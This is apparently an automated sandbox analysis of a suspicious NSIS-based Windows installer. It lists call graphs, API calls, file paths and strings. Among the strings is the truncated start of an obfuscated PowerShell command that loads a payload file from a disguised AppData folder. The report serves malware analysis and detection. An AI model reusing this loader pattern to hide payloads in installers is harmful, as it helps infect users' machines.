4020->4022 4023 40557d MessageBoxIndirectW 4022->4023 4023->4021 2712 401924 2713 401926 2712->2713 2718 402b38 2713->2718 2719 402b44 2718->2719 2764 405dc3 2719->2764 2722 40192b 2724 405629 2722->2724 2803 4058f4 2724->2803 2727 405651 DeleteFileW 2729 401934 2727->2729 2728 405668 2731 405793 2728->2731 2817 405da1 lstrcpynW 2728->2817 2731->2729 2847 4060e4 FindFirstFileW 2731->2847 2732 40568e 2733 4056a1 2732->2733 2734 405694 lstrcatW 2732->2734 2818 405838 lstrlenW 2733->2818 2735 4056a7 2734->2735 2738 4056b7 lstrcatW 2735->2738 2739 4056ad 2735->2739 2741 4056c2 lstrlenW FindFirstFileW 2738->2741 2739->2738 2739->2741 2743 405788 2741->2743 2762 4056e4 2741->2762 2742 4057b1 2850 4057ec lstrlenW CharPrevW 2742->2850 2743->2731 2746 40576b FindNextFileW 2749 405781 FindClose 2746->2749 2746->2762 2747 4055e1 5 API calls 2750 4057c3 2747->2750 2749->2743 2751 4057c7 2750->2751 2752 4057dd 2750->2752 2751->2729 2755 40504b 25 API calls 2751->2755 2754 40504b 25 API calls 2752->2754 2754->2729 2757 4057d4 2755->2757 2756 405629 64 API calls 2756->2762 2758 405c3b 40 API calls 2757->2758 2760 4057db 2758->2760 2759 40504b 25 API calls 2759->2746 2760->2729 2762->2746 2762->2756 2762->2759 2822 405da1 lstrcpynW 2762->2822 2823 4055e1 2762->2823 2831 40504b 2762->2831 2842 405c3b 2762->2842 2765 405dd0 2764->2765 2766 40601b 2765->2766 2769 405e83 GetVersion 2765->2769 2770 405fe9 lstrlenW 2765->2770 2772 405dc3 10 API calls 2765->2772 2775 405efe GetSystemDirectoryW 2765->2775 2776 405f11 GetWindowsDirectoryW 2765->2776 2777 406035 5 API calls 2765->2777 2778 405dc3 10 API calls 2765->2778 2779 405f8a lstrcatW 2765->2779 2780 405f45 SHGetSpecialFolderLocation 2765->2780 2791 405c6e RegOpenKeyExW 2765->2791 2796 405ce8 wsprintfW 2765->2796 2797 405da1 lstrcpynW 2765->2797 2767 402b65 2766->2767 2798 405da1 lstrcpynW 2766->2798 2767->2722 2782 406035 2767->2782 2769->2765 2770->2765 2772->2770 2775->2765 2776->2765 2777->2765 2778->2765 2779->2765 2780->2765 2781 405f5d SHGetPathFromIDListW CoTaskMemFree 2780->2781 2781->2765 2789 406042 2782->2789 2783 4060b8 2784 4060bd CharPrevW 2783->2784 2786 4060de 2783->2786 2784->2783 2785 4060ab CharNextW 2785->2783 2785->2789 2786->2722 2788 406097 CharNextW 2788->2789 2789->2783 2789->2785 2789->2788 2790 4060a6 CharNextW 2789->2790 2799 405819 2789->2799 2790->2785 2792 405ce2 2791->2792 2793 405ca2 RegQueryValueExW 2791->2793 2792->2765 2794 405cc3 RegCloseKey 2793->2794 2794->2792 2796->2765 2797->2765 2798->2767 2800 40581f 2799->2800 2801 405835 2800->2801 2802 405826 CharNextW 2800->2802 2801->2789 2802->2800 2853 405da1 lstrcpynW 2803->2853 2805 405905 2854 405897 CharNextW CharNextW 2805->2854 2808 405649 2808->2727 2808->2728 2809 406035 5 API calls 2815 40591b 2809->2815 2810 40594c lstrlenW 2811 405957 2810->2811 2810->2815 2813 4057ec 3 API calls 2811->2813 2812 4060e4 2 API calls 2812->2815 2814 40595c GetFileAttributesW 2813->2814 2814->2808 2815->2808 2815->2810 2815->2812 2816 405838 2 API calls 2815->2816 2816->2810 2817->2732 2819 405846 2818->2819 2820 405858 2819->2820 2821 40584c CharPrevW 2819->2821 2820->2735 2821->2819 2821->2820 2822->2762 2860 4059e8 GetFileAttributesW 2823->2860 2826 405604 DeleteFileW 2829 40560a 2826->2829 2827 4055fc RemoveDirectoryW 2827->2829 2828 40560e 2828->2762 2829->2828 2830 40561a SetFileAttributesW 2829->2830 2830->2828 2832 405066 2831->2832 2841 405108 2831->2841 2833 405082 lstrlenW 2832->2833 2834 405dc3 18 API calls 2832->2834 2835 405090 lstrlenW 2833->2835 2836 4050ab 2833->2836 2834->2833 2839 4050a2 lstrcatW 2835->2839 2835->2841 2837 4050b1 SetWindowTextW 2836->2837 2838 4050be 2836->2838 2837->2838 2840 4050c4 SendMessageW SendMessageW SendMessageW 2838->2840 2838->2841 2839->2836 2840->2841 2841->2762 2863 40610b GetModuleHandleA 2842->2863 2846 405c63 2846->2762 2848 4057ad 2847->2848 2849 4060fa FindClose 2847->2849 2848->2729 2848->2742 2849->2848 2851 4057b7 2850->2851 2852 405808 lstrcatW 2850->2852 2851->2747 2852->2851 2853->2805 2855 4058b4 2854->2855 2856 4058c6 2854->2856 2855->2856 2857 4058c1 CharNextW 2855->2857 2858 405819 CharNextW 2856->2858 2859 4058ea 2856->2859 2857->2859 2858->2856 2859->2808 2859->2809 2861 4055ed 2860->2861 2862 4059fa SetFileAttributesW 2860->2862 2861->2826 2861->2827 2861->2828 2862->2861 2864 406132 GetProcAddress 2863->2864 2865 406127 LoadLibraryA 2863->2865 2866 405c42 2864->2866 2865->2864 2865->2866 2866->2846 2867 405abf lstrcpyW 2866->2867 2868 405ae8 2867->2868 2869 405b0e GetShortPathNameW 2867->2869 2892 405a0d GetFileAttributesW CreateFileW 2868->2892 2871 405b23 2869->2871 2872 405c35 2869->2872 2871->2872 2874 405b2b wsprintfA 2871->2874 2872->2846 2873 405af2 CloseHandle GetShortPathNameW 2873->2872 2876 405b06 2873->2876 2875 405dc3 18 API calls 2874->2875 2877 405b53 2875->2877 2876->2869 2876->2872 2893 405a0d GetFileAttributesW CreateFileW 2877->2893 2879 405b60 2879->2872 2880 405b6f GetFileSize GlobalAlloc 2879->2880 2881 405b91 2880->2881 2882 405c2e CloseHandle 2880->2882 2894 405a90 ReadFile 2881->2894 2882->2872 2887 405bb0 lstrcpyA 2889 405bd2 2887->2889 2888 405bc4 2890 405972 4 API calls 2888->2890 2891 405c09 SetFilePointer WriteFile GlobalFree 2889->2891 2890->2889 2891->2882 2892->2873 2893->2879 2895 405aae 2894->2895 2895->2882 2896 405972 lstrlenA 2895->2896 2897 4059b3 lstrlenA 2896->2897 2898 4059bb 2897->2898 2899 40598c lstrcmpiA 2897->2899 2898->2887 2898->2888 2899->2898 2900 4059aa CharNextA 2899->2900 2900->2897 4024 402727 4025 40272e 4024->4025 4027 4029c5 4024->4027 4026 402734 FindClose 4025->4026 4026->4027 2915 403229 #17 SetErrorMode OleInitialize 2916 40610b 3 API calls 2915->2916 2917 40326c SHGetFileInfoW 2916->2917 2988 405da1 lstrcpynW 2917->2988 2919 403297 GetCommandLineW 2989 405da1 lstrcpynW 2919->2989 2921 4032a9 GetModuleHandleW 2922 4032c1 2921->2922 2923 405819 CharNextW 2922->2923 2924 4032d0 CharNextW 2923->2924 2934 4032e0 2924->2934 2925 4033b5 2926 4033c9 GetTempPathW 2925->2926 2990 4031f5 2926->2990 2928 4033e1 2929 4033e5 GetWindowsDirectoryW lstrcatW 2928->2929 2930 40343b DeleteFileW 2928->2930 2932 4031f5 11 API calls 2929->2932 2998 402d67 GetTickCount GetModuleFileNameW 2930->2998 2931 405819 CharNextW 2931->2934 2935 403401 2932->2935 2934->2925 2934->2931 2939 4033b7 2934->2939 2935->2930 2938 403405 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2935->2938 2936 40344f 2937 4034e7 2936->2937 2940 4034d7 2936->2940 2944 405819 CharNextW 2936->2944 3083 403691 2937->3083 2943 4031f5 11 API calls 2938->2943 3080 405da1 lstrcpynW 2939->3080 3026 40376b 2940->3026 2947 403433 2943->2947 2948 40346a 2944->2948 2947->2930 2947->2937 2955 4034b1 2948->2955 2956 403516 lstrcatW lstrcmpiW 2948->2956 2949 403500 3090 40557d 2949->3090 2950 4035f6 2951 403679 ExitProcess 2950->2951 2953 40610b 3 API calls 2950->2953 2958 403605 2953->2958 2959 4058f4 18 API calls 2955->2959 2956->2937 2960 403532 CreateDirectoryW SetCurrentDirectoryW 2956->2960 2961 40610b 3 API calls 2958->2961 2962 4034bd 2959->2962 2963 403555 2960->2963 2964 40354a 2960->2964 2965 40360e 2961->2965 2962->2937 3081 405da1 lstrcpynW 2962->3081 3095 405da1 lstrcpynW 2963->3095 3094 405da1 lstrcpynW 2964->3094 2968 40610b 3 API calls 2965->2968 2970 403617 2968->2970 2973 403665 ExitWindowsEx 2970->2973 2979 403625 GetCurrentProcess 2970->2979 2971 4034cc 3082 405da1 lstrcpynW 2971->3082 2972 405dc3 18 API calls 2975 403594 DeleteFileW 2972->2975 2973->2951 2976 403672 2973->2976 2977 4035a1 CopyFileW 2975->2977 2985 403563 2975->2985 3099 40140b 2976->3099 2977->2985 2982 403635 2979->2982 2980 4035ea 2983 405c3b 40 API calls 2980->2983 2981 405c3b 40 API calls 2981->2985 2982->2973 2983->2937 2984 405dc3 18 API calls 2984->2985 2985->2972 2985->2980 2985->2981 2985->2984 2987 4035d5 CloseHandle 2985->2987 3096 40551c CreateProcessW 2985->3096 2987->2985 2988->2919 2989->2921 2991 406035 5 API calls 2990->2991 2993 403201 2991->2993 2992 40320b 2992->2928 2993->2992 2994 4057ec 3 API calls 2993->2994 2995 403213 CreateDirectoryW 2994->2995 3102 405a3c 2995->3102 3106 405a0d GetFileAttributesW CreateFileW 2998->3106 3000 402da7 3019 402db7 3000->3019 3107 405da1 lstrcpynW 3000->3107 3002 402dcd 3003 405838 2 API calls 3002->3003 3004 402dd3 3003->3004 3108 405da1 lstrcpynW 3004->3108 3006 402dde GetFileSize 3007 402eda 3006->3007 3025 402df5 3006->3025 3109 402d03 3007->3109 3009 402ee3 3011 402f13 GlobalAlloc 3009->3011 3009->3019 3145 4031de SetFilePointer 3009->3145 3120 4031de SetFilePointer 3011->3120 3014 402f46 3016 402d03 6 API calls 3014->3016 3015 402f2e 3121 402fa0 3015->3121 3016->3019 3017 402efc 3020 4031c8 ReadFile 3017->3020 3019->2936 3021 402f07 3020->3021 3021->3011 3021->3019 3022 402d03 6 API calls 3022->3025 3023 402f3a 3023->3019 3023->3023 3024 402f77 SetFilePointer 3023->3024 3024->3019 3025->3007 3025->3014 3025->3019 3025->3022 3142 4031c8 3025->3142 3027 40610b 3 API calls 3026->3027 3028 40377f 3027->3028 3029 403785 3028->3029 3030 403797 3028->3030 3167 405ce8 wsprintfW 3029->3167 3031 405c6e 3 API calls 3030->3031 3032 4037c7 3031->3032 3034 4037e6 lstrcatW 3032->3034 3036 405c6e 3 API calls 3032->3036 3035 403795 3034->3035 3151 403a41 3035->3151 3036->3034 3039 4058f4 18 API calls 3041 403818 3039->3041 3040 4038ac 3042 4058f4 18 API calls 3040->3042 3041->3040 3043 405c6e 3 API calls 3041->3043 3044 4038b2 3042->3044 3045 40384a 3043->3045 3046 4038c2 LoadImageW 3044->3046 3047 405dc3 18 API calls 3044->3047 3045->3040 3050 40386b lstrlenW 3045->3050 3053 405819 CharNextW 3045->3053 3048 403968 3046->3048 3049 4038e9 RegisterClassW 3046->3049 3047->3046 3052 40140b 2 API calls 3048->3052 3051 40391f SystemParametersInfoW CreateWindowExW 3049->3051 3079 403972 3049->3079 3054 403879 lstrcmpiW 3050->3054 3055 40389f 3050->3055 3051->3048 3056 40396e 3052->3056 3058 403868 3053->3058 3054->3055 3059 403889 GetFileAttributesW 3054->3059 3057 4057ec 3 API calls 3055->3057 3060 403a41 19 API calls 3056->3060 3056->3079 3061 4038a5 3057->3061 3058->3050 3062 403895 3059->3062 3063 40397f 3060->3063 3168 405da1 lstrcpynW 3061->3168 3062->3055 3065 405838 2 API calls 3062->3065 3066 40398b ShowWindow LoadLibraryW 3063->3066 3067 403a0e 3063->3067 3065->3055 3068 4039b1 GetClassInfoW 3066->3068 3069 4039aa LoadLibraryW 3066->3069 3160 40511e OleInitialize 3067->3160 3071 4039c5 GetClassInfoW RegisterClassW 3068->3071 3072 4039db DialogBoxParamW 3068->3072 3069->3068 3071->3072 3074 40140b 2 API calls 3072->3074 3073 403a14 3075 403a30 3073->3075 3076 403a18 3073->3076 3074->3079 3077 40140b 2 API calls 3075->3077 3078 40140b 2 API calls 3076->3078 3076->3079 3077->3079 3078->3079 3079->2937 3080->2926 3081->2971 3082->2940 3084 4036a9 3083->3084 3085 40369b CloseHandle 3083->3085 3177 4036d6 3084->3177 3085->3084 3088 405629 71 API calls 3089 4034f0 OleUninitialize 3088->3089 3089->2949 3089->2950 3091 405592 3090->3091 3092 40350e ExitProcess 3091->3092 3093 4055a6 MessageBoxIndirectW 3091->3093 3093->3092 3094->2963 3095->2985 3097 405557 3096->3097 3098 40554b CloseHandle 3096->3098 3097->2985 3098->3097 3100 401389 2 API calls 3099->3100 3101 401420 3100->3101 3101->2951 3103 405a49 GetTickCount GetTempFileNameW 3102->3103 3104 403227 3103->3104 3105 405a7f 3103->3105 3104->2928 3105->3103 3105->3104 3106->3000 3107->3002 3108->3006 3110 402d24 3109->3110 3111 402d0c 3109->3111 3112 402d34 GetTickCount 3110->3112 3113 402d2c 3110->3113 3114 402d15 DestroyWindow 3111->3114 3115 402d1c 3111->3115 3117 402d42 CreateDialogParamW ShowWindow 3112->3117 3118 402d65 3112->3118 3146 406144 3113->3146 3114->3115 3115->3009 3117->3118 3118->3009 3120->3015 3122 402fbb 3121->3122 3123 402fe8 3122->3123 3150 4031de SetFilePointer 3122->3150 3124 4031c8 ReadFile 3123->3124 3126 402ff3 3124->3126 3127 403149 3126->3127 3128 403005 GetTickCount 3126->3128 3129 40315e 3126->3129 3127->3023 3128->3127 3138 403052 3128->3138 3130 403162 3129->3130 3131 40317a 3129->3131 3132 4031c8 ReadFile 3130->3132 3131->3127 3134 4031c8 ReadFile 3131->3134 3135 403195 WriteFile 3131->3135 3132->3127 3133 4031c8 ReadFile 3133->3138 3134->3131 3135->3127 3136 4031a9 3135->3136 3136->3127 3136->3131 3137 4030a8 GetTickCount 3137->3138 3138->3127 3138->3133 3138->3137 3139 4030cd MulDiv wsprintfW 3138->3139 3141 403111 WriteFile 3138->3141 3140 40504b 25 API calls 3139->3140 3140->3138 3141->3127 3141->3138 3143 405a90 ReadFile 3142->3143 3144 4031db 3143->3144 3144->3025 3145->3017 3147 406161 PeekMessageW 3146->3147 3148 402d32 3147->3148 3149 406157 DispatchMessageW 3147->3149 3148->3009 3149->3147 3150->3123 3152 403a55 3151->3152 3169 405ce8 wsprintfW 3152->3169 3154 403ac6 3155 405dc3 18 API calls 3154->3155 3156 403ad2 SetWindowTextW 3155->3156 3157 4037f6 3156->3157 3158 403aee 3156->3158 3157->3039 3158->3157 3159 405dc3 18 API calls 3158->3159 3159->3158 3170 404032 3160->3170 3162 405168 3163 404032 SendMessageW 3162->3163 3164 40517a OleUninitialize 3163->3164 3164->3073 3165 405141 3165->3162 3173 401389 3165->3173 3167->3035 3168->3040 3169->3154 3171 40404a 3170->3171 3172 40403b SendMessageW 3170->3172 3171->3165 3172->3171 3175 401390 3173->3175 3174 4013fe 3174->3165 3175->3174 3176 4013cb MulDiv SendMessageW 3175->3176 3176->3175 3178 4036e4 3177->3178 3179 4036ae 3178->3179 3180 4036e9 FreeLibrary GlobalFree 3178->3180 3179->3088 3180->3179 3180->3180 4028 403729 4029 403734 4028->4029 4030 403738 4029->4030 4031 40373b GlobalAlloc 4029->4031 4031->4030 4032 401cab 4033 402b1b 18 API calls 4032->4033 4034 401cb2 4033->4034 4035 402b1b 18 API calls 4034->4035 4036 401cba GetDlgItem 4035->4036 4037 4024e6 4036->4037 3323 40232f 3324 402335 3323->3324 3325 402b38 18 API calls 3324->3325 3326 402347 3325->3326 3327 402b38 18 API calls 3326->3327 3328 402351 RegCreateKeyExW 3327->3328 3329 40237b 3328->3329 3330 402791 3328->3330 3331 402b38 18 API calls 3329->3331 3333 402396 3329->3333 3336 40238c lstrlenW 3331->3336 3332 4023a2 3335 4023bd RegSetValueExW 3332->3335 3337 402fa0 33 API calls 3332->3337 3333->3332 3340 402b1b 3333->3340 3338 4023d3 RegCloseKey 3335->3338 3336->3333 3337->3335 3338->3330 3341 405dc3 18 API calls 3340->3341 3342 402b2f 3341->3342 3342->3332 4038 4016af 4039 402b38 18 API calls 4038->4039 4040 4016b5 GetFullPathNameW 4039->4040 4041 4016f1 4040->4041 4042 4016cf 4040->4042 4043 4029c5 4041->4043 4044 401706 GetShortPathNameW 4041->4044 4042->4041 4045 4060e4 2 API calls 4042->4045 4044->4043 4046 4016e1 4045->4046 4046->4041 4048 405da1 lstrcpynW 4046->4048 4048->4041 4049 4027b3 4050 402b38 18 API calls 4049->4050 4051 4027c1 4050->4051 4052 4027d7 4051->4052 4053 402b38 18 API calls 4051->4053 4054 4059e8 2 API calls 4052->4054 4053->4052 4055 4027dd 4054->4055 4075 405a0d GetFileAttributesW CreateFileW 4055->4075 4057 4027ea 4058 402893 4057->4058 4059 4027f6 GlobalAlloc 4057->4059 4062 40289b DeleteFileW 4058->4062 4063 4028ae 4058->4063 4060 40288a CloseHandle 4059->4060 4061 40280f 4059->4061 4060->4058 4076 4031de SetFilePointer 4061->4076 4062->4063 4065 402815 4066 4031c8 ReadFile 4065->4066 4067 40281e GlobalAlloc 4066->4067 4068 402862 WriteFile GlobalFree 4067->4068 4069 40282e 4067->4069 4070 402fa0 33 API calls 4068->4070 4071 402fa0 33 API calls 4069->4071 4072 402887 4070->4072 4074 40283b 4071->4074 4072->4060 4073 402859 GlobalFree 4073->4068 4074->4073 4075->4057 4076->4065 4077 404134 lstrlenW 4078 404153 4077->4078 4079 404155 WideCharToMultiByte 4077->4079 4078->4079 4080 4028b4 4081 402b1b 18 API calls 4080->4081 4082 4028ba 4081->4082 4083 4028f6 4082->4083 4084 4028dd 4082->4084 4088 402791 4082->4088 4086 402900 4083->4086 4087 40290c 4083->4087 4085 4028e2 4084->4085 4093 4028f3 4084->4093 4094 405da1 lstrcpynW 4085->4094 4089 402b1b 18 API calls 4086->4089 4090 405dc3 18 API calls 4087->4090 4089->4093 4090->4093 4093->4088 4095 405ce8 wsprintfW 4093->4095 4094->4088 4095->4088 4096 4014b8 4097 4014be 4096->4097 4098 401389 2 API calls 4097->4098 4099 4014c6 4098->4099 3468 4015b9 3469 402b38 18 API calls 3468->3469 3470 4015c0 3469->3470 3471 405897 4 API calls 3470->3471 3480 4015c9 3471->3480 3472 401614 3473 401619 3472->3473 3476 401646 3472->3476 3475 401423 25 API calls 3473->3475 3474 405819 CharNextW 3477 4015d7 CreateDirectoryW 3474->3477 3479 401620 3475->3479 3478 401423 25 API calls 3476->3478 3477->3480 3481 4015ed GetLastError 3477->3481 3485 40163e 3478->3485 3486 405da1 lstrcpynW 3479->3486 3480->3472 3480->3474 3481->3480 3483 4015fa GetFileAttributesW 3481->3483 3483->3480 3484 40162d SetCurrentDirectoryW 3484->3485 3486->3484 4100 401939 4101 402b38 18 API calls 4100->4101 4102 401940 lstrlenW 4101->4102 4103 4024e6 4102->4103 4104 402939 4105 402b1b 18 API calls 4104->4105 4106 40293f 4105->4106 4107 402972 4106->4107 4109 402791 4106->4109 4110 40294d 4106->4110 4108 405dc3 18 API calls 4107->4108 4107->4109 4108->4109 4110->4109 4112 405ce8 wsprintfW 4110->4112 4112->4109 4113 40443a 4114 404470 4113->4114 4115 40444a 4113->4115 4117 40404d 8 API calls 4114->4117 4116 403fe6 19 API calls 4115->4116 4118 404457 SetDlgItemTextW 4116->4118 4119 40447c 4117->4119 4118->4114 3487 40173f 3488 402b38 18 API calls 3487->3488 3489 401746 3488->3489 3490 405a3c 2 API calls 3489->3490 3491 40174d 3490->3491 3492 405a3c 2 API calls 3491->3492 3492->3491 4120 404fbf 4121 404fe3 4120->4121 4122 404fcf 4120->4122 4123 404feb IsWindowVisible 4121->4123 4131 405002 4121->4131 4124 404fd5 4122->4124 4125 40502c 4122->4125 4123->4125 4127 404ff8 4123->4127 4126 404032 SendMessageW 4124->4126 4128 405031 CallWindowProcW 4125->4128 4129 404fdf 4126->4129 4130 404915 5 API calls 4127->4130 4128->4129 4130->4131 4131->4128 4132 404995 4 API calls 4131->4132 4132->4125

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403229-4032bf #17 SetErrorMode OleInitialize call 40610b SHGetFileInfoW call 405da1 GetCommandLineW call 405da1 GetModuleHandleW 7 4032c1-4032c8 0->7 8 4032c9-4032db call 405819 CharNextW 0->8 7->8 11 4033a9-4033af 8->11 12 4032e0-4032e6 11->12 13 4033b5 11->13 15 4032e8-4032ed 12->15 16 4032ef-4032f5 12->16 14 4033c9-4033e3 GetTempPathW call 4031f5 13->14 25 4033e5-403403 GetWindowsDirectoryW lstrcatW call 4031f5 14->25 26 40343b-403455 DeleteFileW call 402d67 14->26 15->15 15->16 18 4032f7-4032fb 16->18 19 4032fc-403300 16->19 18->19 20 403306-40330c 19->20 21 40339a-4033a5 call 405819 19->21 23 403326-40333d 20->23 24 40330e-403315 20->24 21->11 39 4033a7-4033a8 21->39 30 40336b-403381 23->30 31 40333f-403355 23->31 28 403317-40331a 24->28 29 40331c 24->29 25->26 44 403405-403435 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031f5 25->44 40 4034eb-4034fa call 403691 OleUninitialize 26->40 41 40345b-403461 26->41 28->23 28->29 29->23 30->21 37 403383-403398 30->37 31->30 35 403357-40335f 31->35 42 403361-403364 35->42 43 403366 35->43 37->21 45 4033b7-4033c4 call 405da1 37->45 39->11 57 403500-403510 call 40557d ExitProcess 40->57 58 4035f6-4035fc 40->58 46 403463-40346e call 405819 41->46 47 4034db-4034e2 call 40376b 41->47 42->30 42->43 43->30 44->26 44->40 45->14 61 403470-403481 46->61 62 4034a5-4034af 46->62 56 4034e7 47->56 56->40 59 403679-403681 58->59 60 4035fe-40361b call 40610b * 3 58->60 66 403683 59->66 67 403687-40368b ExitProcess 59->67 91 403665-403670 ExitWindowsEx 60->91 92 40361d-40361f 60->92 65 403483-403485 61->65 68 4034b1-4034bf call 4058f4 62->68 69 403516-403530 lstrcatW lstrcmpiW 62->69 72 403487-40349d 65->72 73 40349f-4034a3 65->73 66->67 68->40 81 4034c1-4034d7 call 405da1 * 2 68->81 69->40 75 403532-403548 CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->73 73->62 73->65 78 403555-40357e call 405da1 75->78 79 40354a-403550 call 405da1 75->79 87 403583-40359f call 405dc3 DeleteFileW 78->87 79->78 81->47 98 4035e0-4035e8 87->98 99 4035a1-4035b1 CopyFileW 87->99 91->59 96 403672-403674 call 40140b 91->96 92->91 97 403621-403623 92->97 96->59 97->91 101 403625-403637 GetCurrentProcess 97->101 98->87 103 4035ea-4035f1 call 405c3b 98->103 99->98 102 4035b3-4035d3 call 405c3b call 405dc3 call 40551c 99->102 101->91 109 403639-40365b 101->109 102->98 115 4035d5-4035dc CloseHandle 102->115 103->40 109->91 115->98
                                                                  APIs
                                                                  • #17.COMCTL32 ref: 00403248
                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403253
                                                                  • OleInitialize.OLE32(00000000), ref: 0040325A
                                                                    • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                    • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                    • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403282
                                                                    • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,00433EA0,NSIS Error), ref: 00405DAE
                                                                  • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 00403297
                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000), ref: 004032AA
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000020), ref: 004032D1
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033DA
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033EB
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F7
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040340B
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403413
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403424
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040342C
                                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403440
                                                                  • OleUninitialize.OLE32(?), ref: 004034F0
                                                                  • ExitProcess.KERNEL32 ref: 00403510
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000,?), ref: 0040351C
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000,?), ref: 00403528
                                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403534
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040353B
                                                                  • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overs,?), ref: 00403595
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yMXFgPOdf2.exe,0042A9B8,00000001), ref: 004035A9
                                                                  • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 004035D6
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040362C
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403668
                                                                  • ExitProcess.KERNEL32 ref: 0040368B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overs$"C:\Users\user\Desktop\yMXFgPOdf2.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens$C:\Users\user\Desktop$C:\Users\user\Desktop\yMXFgPOdf2.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                  • API String ID: 4107622049-1353860307
                                                                  • Opcode ID: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                  • Instruction ID: 02b0c0aa23ea66072d22554f7a9d706dafbd78a3d23bdfa468f983da76c936b2
                                                                  • Opcode Fuzzy Hash: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                  • Instruction Fuzzy Hash: 48B1D230504310AAD7207F619E4AA2B3EACEF4574AF00443FF941B62E1DBBD4A45CB6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
